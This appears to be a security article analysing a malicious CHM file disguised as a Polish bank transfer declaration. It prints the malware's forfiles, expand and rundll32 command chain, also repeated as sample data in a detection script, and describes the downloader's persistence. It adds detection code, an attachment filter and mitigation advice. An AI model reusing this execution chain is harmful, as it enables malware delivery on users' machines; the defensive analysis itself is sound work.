Cybercriminals Exploit Compiled HTML Help Files to Deploy Malicious Payloads

In a recent cybersecurity incident, a malicious Microsoft Compiled HTML Help (CHM) file named deklaracja.chm was uploaded from Poland on June 30, 2025. This file, disguised as a bank transfer declaration, demonstrates how outdated documentation formats can be repurposed to deliver sophisticated malware.

Understanding CHM Files

CHM files, introduced by Microsoft in 1997, are compiled HTML documents used for software documentation and user manuals. They consist of compressed HTML pages, images, and JavaScript files, along with a hyperlinked table of contents and an index. Despite being considered obsolete, CHM files remain compatible with modern Windows versions, making them a potential vector for cyberattacks.

Anatomy of the Attack

Upon execution, the deklaracja.chm file opens a help window displaying a benign receipt image to deceive the user. Simultaneously, it executes an obfuscated `index.htm` file containing JavaScript code. This script decodes a lengthy hexadecimal string, dynamically generates HTML content, and silently downloads a disguised cabinet archive (`desktop.mp3`) through a deprecated HTML tag. The archive contains a downloader DLL, which never appears in the user interface.

The attack leverages the HTML Help ActiveX control (`adb880a6-d8ff-11cf-9377-00aa003b7a11`) to execute a hidden command chain. It utilizes the legitimate Windows binary `forfiles.exe` to avoid suspicious parent-child process relationships, reflecting a trend in living-off-the-land (LotL) techniques. These methods allow attackers to evade behavioral defenses while achieving code execution on fully patched systems.

Infection Mechanism

The ActiveX control programmatically triggers a command that spawns a minimized command prompt. The following command illustrates the core of the intrusion:

```bat
cmd /min /c forfiles /p %temp% /m *.tmp /c cmd /c if @fsize==180738 expand @file %temp%\uNT32.dll & rundll32 %temp%\uNT32.dll,#1
```

Here, `forfiles` searches for a `.tmp` file of a specific size in the `%temp%` directory. Upon finding the file, the `expand` utility unpacks `uNT32.dll` from the cabinet archive, and `rundll32` executes its export function `#1`, launching the downloader.

The `uNT32.dll` file decrypts embedded strings using a 128-byte rotating XOR key and employs WinHTTP to fetch a payload from a remote server. If the downloaded file exceeds a certain size, the excess data is XOR-decrypted into `net32.dll`, stored in `%LocalAppData%\TaskSync\`, and registered as a scheduled task. This process ensures persistence without modifying the registry.
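The chain above leaves a distinctive footprint in process-creation telemetry: the HTML Help viewer spawning a shell, `forfiles` acting as a proxy for `expand` and `rundll32`, and `rundll32` loading a DLL from the user's temp directory. The following detection logic is an added example written for this article, not code from the original report or the analyzed sample. It assumes a Sysmon-like event shape (parent image, image, command line) and that the CHM viewer's parent process is `hh.exe`, the Windows HTML Help executable; the events it runs over are constructed samples.

```python
"""Flag the forfiles -> expand -> rundll32 chain in process-creation events.

The events below are constructed samples, not real telemetry. The field
names (parent, image, cmdline) are an assumption about your log schema.
"""
import ntpath
import re

# A DLL path under %temp% or the per-user Temp directory.
TEMP_DIR_RE = re.compile(r"(%temp%|\\appdata\\local\\temp\\)", re.IGNORECASE)
# First .dll argument handed to rundll32.
RUNDLL32_ARG_RE = re.compile(r"rundll32(?:\.exe)?\s+(\S+?\.dll)", re.IGNORECASE)

SAMPLE_EVENTS = [
    # 0: the CHM viewer (hh.exe, assumed parent) spawning the full chain
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /min /c forfiles /p %temp% /m *.tmp /c cmd /c if @fsize==180738 expand @file %temp%\uNT32.dll & rundll32 %temp%\uNT32.dll,#1"},
    # 1: forfiles itself, with the expand/rundll32 payload in its /c argument
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\Users\u\AppData\Local\Temp /m *.tmp /c "cmd /c if @fsize==180738 expand @file %temp%\uNT32.dll & rundll32 %temp%\uNT32.dll,#1"'},
    # 2: rundll32 loading the dropped DLL from Temp
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 C:\Users\u\AppData\Local\Temp\uNT32.dll,#1"},
    # 3: benign rundll32 use (control panel applet)
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 shell32.dll,Control_RunDLL"},
    # 4: benign forfiles use (log rotation)
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @file"'},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(event):
    """Return the list of rule names the event triggers (empty if nothing fires)."""
    hits = []
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event["cmdline"]
    low = cmd.lower()

    # Help viewer should never need a command shell.
    if parent == "hh.exe" and image == "cmd.exe":
        hits.append("help-viewer-spawned-shell")
    # forfiles used only to launch expand/rundll32 under a different parent.
    if image == "forfiles.exe" and ("rundll32" in low or "expand " in low):
        hits.append("forfiles-proxy-execution")
    # All three stages present in one command line.
    if "forfiles" in low and "expand" in low and "rundll32" in low:
        hits.append("forfiles-expand-rundll32-chain")
    # rundll32 loading a DLL from a temp directory.
    if image == "rundll32.exe":
        match = RUNDLL32_ARG_RE.search(cmd)
        if match and TEMP_DIR_RE.search(match.group(1)):
            hits.append("rundll32-dll-from-temp")
    return hits


def scan(events):
    """Map event index -> triggered rules, for events that triggered anything."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}


if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS).items():
        print(index, rules)
```

The benign events (a control panel applet via `rundll32`, log rotation via `forfiles`) show why the rules key on the combination of tool and argument rather than on either binary alone; both are legitimate Windows utilities and alerting on their mere presence would drown analysts in noise.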

Broader Implications

This incident underscores the evolving tactics of cybercriminals who repurpose legacy file formats to bypass modern security measures. By exploiting CHM files, attackers can blend user interface deception, trusted Windows binaries, and subtle network traffic to establish a foothold in target systems.

Recommendations for Mitigation

To protect against such attacks, consider the following measures:

1. User Education: Train users to recognize and avoid opening unsolicited or suspicious email attachments, especially those with uncommon file extensions like `.chm`.

2. Email Filtering: Configure email security solutions to block or flag emails containing CHM attachments.

3. Endpoint Protection: Deploy advanced endpoint detection and response (EDR) solutions capable of identifying and mitigating LotL techniques.

4. Software Restrictions: Implement application whitelisting to prevent the execution of unauthorized scripts and binaries.

5. Regular Updates: Ensure all software, including operating systems and security tools, is kept up to date with the latest patches.
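Blocking CHM attachments by extension alone (recommendation 2) misses a file that has been renamed, so a gateway check should also look at the content. The following is an added example, not code from the article or from any mail security product: it classifies attachments by the `ITSF` header that every compiled HTML Help file begins with, in addition to the `.chm` extension. The attachments it inspects are constructed byte strings.

```python
"""Classify mail attachments as CHM by content, not only by extension.

The samples below are constructed byte strings, not real files.
"""
import ntpath

# Every CHM file starts with the ITSS storage header signature "ITSF".
CHM_MAGIC = b"ITSF"
BLOCKED_EXTENSIONS = {".chm"}

SAMPLE_ATTACHMENTS = {
    # CHM with its real extension (header plus constructed padding)
    "deklaracja.chm": CHM_MAGIC + b"\x03\x00\x00\x00" + b"\x00" * 56,
    # CHM renamed to look like a PDF; extension filtering alone would pass it
    "invoice.pdf": CHM_MAGIC + b"\x00" * 60,
    # genuine PDF header
    "report.pdf": b"%PDF-1.7\n" + b"\x00" * 50,
    # not a CHM, but the extension alone is reason enough to refuse it
    "notes.chm": b"plain text with the wrong extension",
    # ordinary text file
    "readme.txt": b"hello",
}


def is_chm_content(data: bytes) -> bool:
    """True when the first bytes carry the CHM (ITSS) header signature."""
    return data[:4] == CHM_MAGIC


def classify_attachment(name: str, data: bytes) -> str:
    """Return 'block' with a reason suffix, or 'allow'."""
    ext = ntpath.splitext(name)[1].lower()
    if is_chm_content(data):
        # Content wins over the name: a renamed CHM is still a CHM.
        return "block:chm-content"
    if ext in BLOCKED_EXTENSIONS:
        return "block:chm-extension"
    return "allow"


def classify_all(attachments: dict) -> dict:
    """Map attachment name -> decision for a whole message."""
    return {name: classify_attachment(name, data) for name, data in attachments.items()}


if __name__ == "__main__":
    for name, decision in classify_all(SAMPLE_ATTACHMENTS).items():
        print(f"{name:16} {decision}")
```

The content check is cheap (four bytes) and catches the case the extension rule cannot, while keeping the extension rule covers files a gateway cannot fully read, such as a truncated or partially scanned attachment.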

By adopting a multi-layered security approach and staying informed about emerging threats, organizations can enhance their resilience against sophisticated cyberattacks.